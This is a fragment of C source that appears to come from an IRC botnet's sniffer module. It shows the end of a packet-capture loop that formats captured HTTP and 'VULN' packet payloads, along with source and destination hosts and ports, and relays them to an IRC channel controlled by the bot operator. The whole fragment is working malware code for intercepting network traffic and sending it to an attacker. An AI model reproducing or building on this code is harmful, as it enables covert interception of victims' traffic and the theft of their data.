                    _snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 HTTP sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket);
                    if (!sniff.silent)
                        irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
                }
                else if(IsSuspiciousVULN(szPacket)) {
                    _snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 VULN sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket);
                    if (!sniff.silent)
                        irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
                }
            }
        }
    }
    /* Not reached as written: the loop above has no exit. */
    fclosesocket(sock);
    clearthread(sniff.threadnum);
    ExitThread(0);
    return 0;
}